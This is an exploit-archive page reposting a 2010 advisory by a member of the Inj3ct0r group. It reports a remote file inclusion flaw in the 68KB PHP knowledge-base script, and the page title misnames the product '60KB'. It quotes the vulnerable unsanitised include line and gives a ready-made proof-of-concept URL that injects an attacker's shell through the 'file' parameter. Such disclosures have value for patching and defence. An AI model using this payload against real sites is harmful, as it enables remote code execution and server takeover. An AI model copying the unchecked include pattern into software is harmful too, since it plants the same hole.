60KB 1.0.0.rc4 Remote File Inclusion

60KB 1.0.0.rc4 Remote File Inclusion: Posted Aug 3, 2010; Authored by eidelweiss; 60KB version 1.0.0rc4 suffers from a remote file inclusion vulnerability.; tags | exploit, remote, code execution, file inclusion; SHA-256 | 884f05560b6c545a87f62b2d9f131788fe65e958bb8f5955c7804a0cdb0f7607; Download | Favorite | View

60KB 1.0.0.rc4 Remote File Inclusion

====================================================
68KB v1.0.0rc4 Remote File Include Vulnerability
====================================================


 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0     _                   __           __       __                     1
 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
 1                  \ \____/ >> Exploit database separated by exploit   0
 0                   \/___/          type (local, remote, DoS, etc.)    1
 1                                                                      1
 0  [+] Site            : Inj3ct0r.com                                  0
 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
 0                                                                      0
 1                    ########################################          1
 0                    I'm eidelweiss member from Inj3ct0r Team          1
 1                    ########################################          0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


Vendor:     http://68kb.com
download:   http://github.com/68designs/68KB/downloads
Author:     eidelweiss
Contact:    g1xsystem[at]windowslive.com
Original Advisories :  http://eidelweiss-advisories.blogspot.com/2010/08/68kb-v100rc4-remote-file-include.html
=====================================================================

Description:

68KB is an open source PHP MySQL driven knowledge base script. Built with you in mind to make it easy to configure and setup.

Note:
This is the same vuln in other lower version (http://www.exploit-db.com/exploits/11904/)
Vendor Not Fix the vulnerability in all folder !!!

=====================================================================
 
    -=[ vuln c0de ]=-
 
[!] path/themes/admin/default/modules/show.php


  <?php include_once($file); ?>
 
 
=====================================================================
 
    -=[ P0C ]=-
 
    http://127.0.0.1/path/themes/admin/default/modules/show.php?file= [inj3ct0r shell]
 

 
=========================| -=[ E0F ]=- |=================================

Top Authors In Last 30 Days

Red Hat 295 files
Ubuntu 58 files
Debian 33 files
Gentoo 32 files
LiquidWorm 10 files
Apple 9 files
malvuln 6 files
Adam Gowdiak 4 files
nu11secur1ty 4 files
Ahmet Umit Bayram 4 files

File Archives

Systems

AIX (429)
Apple (2,087)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,042)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,598)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,755)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,493)
UNIX (9,400)
UnixWare (187)
Windows (6,659)
Other

60KB 1.0.0.rc4 Remote File Inclusion

60KB 1.0.0.rc4 Remote File Inclusion

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

60KB 1.0.0.rc4 Remote File Inclusion

Share This

60KB 1.0.0.rc4 Remote File Inclusion

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems